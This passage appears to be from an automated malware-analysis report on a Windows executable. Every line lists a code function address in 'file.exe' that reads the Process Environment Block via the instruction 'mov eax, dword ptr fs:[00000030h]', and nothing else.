Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010BE3F0 mov eax, dword ptr fs:[00000030h] 2_2_010BE3F0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109823B mov eax, dword ptr fs:[00000030h] 2_2_0109823B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0115A250 mov eax, dword ptr fs:[00000030h] 2_2_0115A250
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0115A250 mov eax, dword ptr fs:[00000030h] 2_2_0115A250
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01128243 mov eax, dword ptr fs:[00000030h] 2_2_01128243
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01128243 mov ecx, dword ptr fs:[00000030h] 2_2_01128243
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A6259 mov eax, dword ptr fs:[00000030h] 2_2_010A6259
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109A250 mov eax, dword ptr fs:[00000030h] 2_2_0109A250
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01150274 mov eax, dword ptr fs:[00000030h] 2_2_01150274
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01150274 mov eax, dword ptr fs:[00000030h] 2_2_01150274
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01150274 mov eax, dword ptr fs:[00000030h] 2_2_01150274
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01150274 mov eax, dword ptr fs:[00000030h] 2_2_01150274
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01150274 mov eax, dword ptr fs:[00000030h] 2_2_01150274
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01150274 mov eax, dword ptr fs:[00000030h] 2_2_01150274
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01150274 mov eax, dword ptr fs:[00000030h] 2_2_01150274
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01150274 mov eax, dword ptr fs:[00000030h] 2_2_01150274
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01150274 mov eax, dword ptr fs:[00000030h] 2_2_01150274
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01150274 mov eax, dword ptr fs:[00000030h] 2_2_01150274
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01150274 mov eax, dword ptr fs:[00000030h] 2_2_01150274
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01150274 mov eax, dword ptr fs:[00000030h] 2_2_01150274
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109826B mov eax, dword ptr fs:[00000030h] 2_2_0109826B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A4260 mov eax, dword ptr fs:[00000030h] 2_2_010A4260
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A4260 mov eax, dword ptr fs:[00000030h] 2_2_010A4260
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A4260 mov eax, dword ptr fs:[00000030h] 2_2_010A4260
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DE284 mov eax, dword ptr fs:[00000030h] 2_2_010DE284
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DE284 mov eax, dword ptr fs:[00000030h] 2_2_010DE284
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01120283 mov eax, dword ptr fs:[00000030h] 2_2_01120283
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01120283 mov eax, dword ptr fs:[00000030h] 2_2_01120283
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01120283 mov eax, dword ptr fs:[00000030h] 2_2_01120283
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B02A0 mov eax, dword ptr fs:[00000030h] 2_2_010B02A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B02A0 mov eax, dword ptr fs:[00000030h] 2_2_010B02A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011362A0 mov eax, dword ptr fs:[00000030h] 2_2_011362A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011362A0 mov ecx, dword ptr fs:[00000030h] 2_2_011362A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011362A0 mov eax, dword ptr fs:[00000030h] 2_2_011362A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011362A0 mov eax, dword ptr fs:[00000030h] 2_2_011362A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011362A0 mov eax, dword ptr fs:[00000030h] 2_2_011362A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011362A0 mov eax, dword ptr fs:[00000030h] 2_2_011362A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AA2C3 mov eax, dword ptr fs:[00000030h] 2_2_010AA2C3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AA2C3 mov eax, dword ptr fs:[00000030h] 2_2_010AA2C3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AA2C3 mov eax, dword ptr fs:[00000030h] 2_2_010AA2C3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AA2C3 mov eax, dword ptr fs:[00000030h] 2_2_010AA2C3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AA2C3 mov eax, dword ptr fs:[00000030h] 2_2_010AA2C3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B02E1 mov eax, dword ptr fs:[00000030h] 2_2_010B02E1
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B02E1 mov eax, dword ptr fs:[00000030h] 2_2_010B02E1
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B02E1 mov eax, dword ptr fs:[00000030h] 2_2_010B02E1
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01136500 mov eax, dword ptr fs:[00000030h] 2_2_01136500
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01174500 mov eax, dword ptr fs:[00000030h] 2_2_01174500
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01174500 mov eax, dword ptr fs:[00000030h] 2_2_01174500
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01174500 mov eax, dword ptr fs:[00000030h] 2_2_01174500
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01174500 mov eax, dword ptr fs:[00000030h] 2_2_01174500
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01174500 mov eax, dword ptr fs:[00000030h] 2_2_01174500
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01174500 mov eax, dword ptr fs:[00000030h] 2_2_01174500
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01174500 mov eax, dword ptr fs:[00000030h] 2_2_01174500
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CE53E mov eax, dword ptr fs:[00000030h] 2_2_010CE53E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CE53E mov eax, dword ptr fs:[00000030h] 2_2_010CE53E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CE53E mov eax, dword ptr fs:[00000030h] 2_2_010CE53E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CE53E mov eax, dword ptr fs:[00000030h] 2_2_010CE53E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CE53E mov eax, dword ptr fs:[00000030h] 2_2_010CE53E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0535 mov eax, dword ptr fs:[00000030h] 2_2_010B0535
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0535 mov eax, dword ptr fs:[00000030h] 2_2_010B0535
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0535 mov eax, dword ptr fs:[00000030h] 2_2_010B0535
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0535 mov eax, dword ptr fs:[00000030h] 2_2_010B0535
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0535 mov eax, dword ptr fs:[00000030h] 2_2_010B0535
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0535 mov eax, dword ptr fs:[00000030h] 2_2_010B0535
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A8550 mov eax, dword ptr fs:[00000030h] 2_2_010A8550
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A8550 mov eax, dword ptr fs:[00000030h] 2_2_010A8550
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D656A mov eax, dword ptr fs:[00000030h] 2_2_010D656A
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D656A mov eax, dword ptr fs:[00000030h] 2_2_010D656A
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D656A mov eax, dword ptr fs:[00000030h] 2_2_010D656A
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D4588 mov eax, dword ptr fs:[00000030h] 2_2_010D4588
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A2582 mov eax, dword ptr fs:[00000030h] 2_2_010A2582
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A2582 mov ecx, dword ptr fs:[00000030h] 2_2_010A2582
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DE59C mov eax, dword ptr fs:[00000030h] 2_2_010DE59C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011205A7 mov eax, dword ptr fs:[00000030h] 2_2_011205A7
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011205A7 mov eax, dword ptr fs:[00000030h] 2_2_011205A7
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011205A7 mov eax, dword ptr fs:[00000030h] 2_2_011205A7
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C45B1 mov eax, dword ptr fs:[00000030h] 2_2_010C45B1
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C45B1 mov eax, dword ptr fs:[00000030h] 2_2_010C45B1
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DE5CF mov eax, dword ptr fs:[00000030h] 2_2_010DE5CF
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DE5CF mov eax, dword ptr fs:[00000030h] 2_2_010DE5CF
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A65D0 mov eax, dword ptr fs:[00000030h] 2_2_010A65D0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DA5D0 mov eax, dword ptr fs:[00000030h] 2_2_010DA5D0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DA5D0 mov eax, dword ptr fs:[00000030h] 2_2_010DA5D0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DC5ED mov eax, dword ptr fs:[00000030h] 2_2_010DC5ED
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DC5ED mov eax, dword ptr fs:[00000030h] 2_2_010DC5ED
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A25E0 mov eax, dword ptr fs:[00000030h] 2_2_010A25E0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CE5E7 mov eax, dword ptr fs:[00000030h] 2_2_010CE5E7
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CE5E7 mov eax, dword ptr fs:[00000030h] 2_2_010CE5E7
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CE5E7 mov eax, dword ptr fs:[00000030h] 2_2_010CE5E7
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CE5E7 mov eax, dword ptr fs:[00000030h] 2_2_010CE5E7
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CE5E7 mov eax, dword ptr fs:[00000030h] 2_2_010CE5E7
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CE5E7 mov eax, dword ptr fs:[00000030h] 2_2_010CE5E7
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CE5E7 mov eax, dword ptr fs:[00000030h] 2_2_010CE5E7
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CE5E7 mov eax, dword ptr fs:[00000030h] 2_2_010CE5E7
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D8402 mov eax, dword ptr fs:[00000030h] 2_2_010D8402
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D8402 mov eax, dword ptr fs:[00000030h] 2_2_010D8402
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D8402 mov eax, dword ptr fs:[00000030h] 2_2_010D8402
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109E420 mov eax, dword ptr fs:[00000030h] 2_2_0109E420
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109E420 mov eax, dword ptr fs:[00000030h] 2_2_0109E420
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109E420 mov eax, dword ptr fs:[00000030h] 2_2_0109E420
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109C427 mov eax, dword ptr fs:[00000030h] 2_2_0109C427
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01126420 mov eax, dword ptr fs:[00000030h] 2_2_01126420
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01126420 mov eax, dword ptr fs:[00000030h] 2_2_01126420
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01126420 mov eax, dword ptr fs:[00000030h] 2_2_01126420
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01126420 mov eax, dword ptr fs:[00000030h] 2_2_01126420
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01126420 mov eax, dword ptr fs:[00000030h] 2_2_01126420
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01126420 mov eax, dword ptr fs:[00000030h] 2_2_01126420
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01126420 mov eax, dword ptr fs:[00000030h] 2_2_01126420
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DA430 mov eax, dword ptr fs:[00000030h] 2_2_010DA430
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0115A456 mov eax, dword ptr fs:[00000030h] 2_2_0115A456
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DE443 mov eax, dword ptr fs:[00000030h] 2_2_010DE443
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DE443 mov eax, dword ptr fs:[00000030h] 2_2_010DE443
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DE443 mov eax, dword ptr fs:[00000030h] 2_2_010DE443
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DE443 mov eax, dword ptr fs:[00000030h] 2_2_010DE443
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DE443 mov eax, dword ptr fs:[00000030h] 2_2_010DE443
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DE443 mov eax, dword ptr fs:[00000030h] 2_2_010DE443
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DE443 mov eax, dword ptr fs:[00000030h] 2_2_010DE443
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DE443 mov eax, dword ptr fs:[00000030h] 2_2_010DE443
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109645D mov eax, dword ptr fs:[00000030h] 2_2_0109645D
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C245A mov eax, dword ptr fs:[00000030h] 2_2_010C245A
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112C460 mov ecx, dword ptr fs:[00000030h] 2_2_0112C460
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CA470 mov eax, dword ptr fs:[00000030h] 2_2_010CA470
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CA470 mov eax, dword ptr fs:[00000030h] 2_2_010CA470
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CA470 mov eax, dword ptr fs:[00000030h] 2_2_010CA470
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0115A49A mov eax, dword ptr fs:[00000030h] 2_2_0115A49A
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A64AB mov eax, dword ptr fs:[00000030h] 2_2_010A64AB
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112A4B0 mov eax, dword ptr fs:[00000030h] 2_2_0112A4B0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D44B0 mov ecx, dword ptr fs:[00000030h] 2_2_010D44B0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A04E5 mov ecx, dword ptr fs:[00000030h] 2_2_010A04E5
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DC700 mov eax, dword ptr fs:[00000030h] 2_2_010DC700
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A0710 mov eax, dword ptr fs:[00000030h] 2_2_010A0710
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D0710 mov eax, dword ptr fs:[00000030h] 2_2_010D0710
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111C730 mov eax, dword ptr fs:[00000030h] 2_2_0111C730
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DC720 mov eax, dword ptr fs:[00000030h] 2_2_010DC720
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DC720 mov eax, dword ptr fs:[00000030h] 2_2_010DC720
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D273C mov eax, dword ptr fs:[00000030h] 2_2_010D273C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D273C mov ecx, dword ptr fs:[00000030h] 2_2_010D273C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D273C mov eax, dword ptr fs:[00000030h] 2_2_010D273C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D674D mov esi, dword ptr fs:[00000030h] 2_2_010D674D
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D674D mov eax, dword ptr fs:[00000030h] 2_2_010D674D
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D674D mov eax, dword ptr fs:[00000030h] 2_2_010D674D
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01124755 mov eax, dword ptr fs:[00000030h] 2_2_01124755
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112E75D mov eax, dword ptr fs:[00000030h] 2_2_0112E75D
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A0750 mov eax, dword ptr fs:[00000030h] 2_2_010A0750
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2750 mov eax, dword ptr fs:[00000030h] 2_2_010E2750
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2750 mov eax, dword ptr fs:[00000030h] 2_2_010E2750
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A8770 mov eax, dword ptr fs:[00000030h] 2_2_010A8770
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0770 mov eax, dword ptr fs:[00000030h] 2_2_010B0770
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0770 mov eax, dword ptr fs:[00000030h] 2_2_010B0770
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0770 mov eax, dword ptr fs:[00000030h] 2_2_010B0770
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0770 mov eax, dword ptr fs:[00000030h] 2_2_010B0770
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0770 mov eax, dword ptr fs:[00000030h] 2_2_010B0770
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0770 mov eax, dword ptr fs:[00000030h] 2_2_010B0770
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0770 mov eax, dword ptr fs:[00000030h] 2_2_010B0770
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0770 mov eax, dword ptr fs:[00000030h] 2_2_010B0770
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0770 mov eax, dword ptr fs:[00000030h] 2_2_010B0770
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0770 mov eax, dword ptr fs:[00000030h] 2_2_010B0770
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0770 mov eax, dword ptr fs:[00000030h] 2_2_010B0770
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0770 mov eax, dword ptr fs:[00000030h] 2_2_010B0770
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114678E mov eax, dword ptr fs:[00000030h] 2_2_0114678E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A07AF mov eax, dword ptr fs:[00000030h] 2_2_010A07AF
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011547A0 mov eax, dword ptr fs:[00000030h] 2_2_011547A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AC7C0 mov eax, dword ptr fs:[00000030h] 2_2_010AC7C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011207C3 mov eax, dword ptr fs:[00000030h] 2_2_011207C3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C27ED mov eax, dword ptr fs:[00000030h] 2_2_010C27ED
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C27ED mov eax, dword ptr fs:[00000030h] 2_2_010C27ED
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C27ED mov eax, dword ptr fs:[00000030h] 2_2_010C27ED
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A47FB mov eax, dword ptr fs:[00000030h] 2_2_010A47FB
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A47FB mov eax, dword ptr fs:[00000030h] 2_2_010A47FB
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112E7E1 mov eax, dword ptr fs:[00000030h] 2_2_0112E7E1
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B260B mov eax, dword ptr fs:[00000030h] 2_2_010B260B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B260B mov eax, dword ptr fs:[00000030h] 2_2_010B260B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B260B mov eax, dword ptr fs:[00000030h] 2_2_010B260B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B260B mov eax, dword ptr fs:[00000030h] 2_2_010B260B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B260B mov eax, dword ptr fs:[00000030h] 2_2_010B260B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B260B mov eax, dword ptr fs:[00000030h] 2_2_010B260B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B260B mov eax, dword ptr fs:[00000030h] 2_2_010B260B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2619 mov eax, dword ptr fs:[00000030h] 2_2_010E2619
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111E609 mov eax, dword ptr fs:[00000030h] 2_2_0111E609
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A262C mov eax, dword ptr fs:[00000030h] 2_2_010A262C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010BE627 mov eax, dword ptr fs:[00000030h] 2_2_010BE627
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D6620 mov eax, dword ptr fs:[00000030h] 2_2_010D6620
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D8620 mov eax, dword ptr fs:[00000030h] 2_2_010D8620
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010BC640 mov eax, dword ptr fs:[00000030h] 2_2_010BC640
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DA660 mov eax, dword ptr fs:[00000030h] 2_2_010DA660
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DA660 mov eax, dword ptr fs:[00000030h] 2_2_010DA660
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116866E mov eax, dword ptr fs:[00000030h] 2_2_0116866E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116866E mov eax, dword ptr fs:[00000030h] 2_2_0116866E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D2674 mov eax, dword ptr fs:[00000030h] 2_2_010D2674
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A4690 mov eax, dword ptr fs:[00000030h] 2_2_010A4690
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A4690 mov eax, dword ptr fs:[00000030h] 2_2_010A4690
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DC6A6 mov eax, dword ptr fs:[00000030h] 2_2_010DC6A6
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D66B0 mov eax, dword ptr fs:[00000030h] 2_2_010D66B0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DA6C7 mov ebx, dword ptr fs:[00000030h] 2_2_010DA6C7
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DA6C7 mov eax, dword ptr fs:[00000030h] 2_2_010DA6C7
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111E6F2 mov eax, dword ptr fs:[00000030h] 2_2_0111E6F2
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111E6F2 mov eax, dword ptr fs:[00000030h] 2_2_0111E6F2
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111E6F2 mov eax, dword ptr fs:[00000030h] 2_2_0111E6F2
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111E6F2 mov eax, dword ptr fs:[00000030h] 2_2_0111E6F2
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011206F1 mov eax, dword ptr fs:[00000030h] 2_2_011206F1
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011206F1 mov eax, dword ptr fs:[00000030h] 2_2_011206F1
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112C912 mov eax, dword ptr fs:[00000030h] 2_2_0112C912
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01098918 mov eax, dword ptr fs:[00000030h] 2_2_01098918
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01098918 mov eax, dword ptr fs:[00000030h] 2_2_01098918
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111E908 mov eax, dword ptr fs:[00000030h] 2_2_0111E908
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111E908 mov eax, dword ptr fs:[00000030h] 2_2_0111E908
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112892A mov eax, dword ptr fs:[00000030h] 2_2_0112892A
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0113892B mov eax, dword ptr fs:[00000030h] 2_2_0113892B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01120946 mov eax, dword ptr fs:[00000030h] 2_2_01120946
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E096E mov eax, dword ptr fs:[00000030h] 2_2_010E096E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E096E mov edx, dword ptr fs:[00000030h] 2_2_010E096E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E096E mov eax, dword ptr fs:[00000030h] 2_2_010E096E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01144978 mov eax, dword ptr fs:[00000030h] 2_2_01144978
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01144978 mov eax, dword ptr fs:[00000030h] 2_2_01144978
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C6962 mov eax, dword ptr fs:[00000030h] 2_2_010C6962
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C6962 mov eax, dword ptr fs:[00000030h] 2_2_010C6962
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C6962 mov eax, dword ptr fs:[00000030h] 2_2_010C6962
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112C97C mov eax, dword ptr fs:[00000030h] 2_2_0112C97C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011289B3 mov esi, dword ptr fs:[00000030h] 2_2_011289B3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011289B3 mov eax, dword ptr fs:[00000030h] 2_2_011289B3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011289B3 mov eax, dword ptr fs:[00000030h] 2_2_011289B3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A09AD mov eax, dword ptr fs:[00000030h] 2_2_010A09AD
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A09AD mov eax, dword ptr fs:[00000030h] 2_2_010A09AD
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B29A0 mov eax, dword ptr fs:[00000030h] 2_2_010B29A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B29A0 mov eax, dword ptr fs:[00000030h] 2_2_010B29A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B29A0 mov eax, dword ptr fs:[00000030h] 2_2_010B29A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B29A0 mov eax, dword ptr fs:[00000030h] 2_2_010B29A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B29A0 mov eax, dword ptr fs:[00000030h] 2_2_010B29A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B29A0 mov eax, dword ptr fs:[00000030h] 2_2_010B29A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B29A0 mov eax, dword ptr fs:[00000030h] 2_2_010B29A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B29A0 mov eax, dword ptr fs:[00000030h] 2_2_010B29A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B29A0 mov eax, dword ptr fs:[00000030h] 2_2_010B29A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B29A0 mov eax, dword ptr fs:[00000030h] 2_2_010B29A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B29A0 mov eax, dword ptr fs:[00000030h] 2_2_010B29A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B29A0 mov eax, dword ptr fs:[00000030h] 2_2_010B29A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B29A0 mov eax, dword ptr fs:[00000030h] 2_2_010B29A0
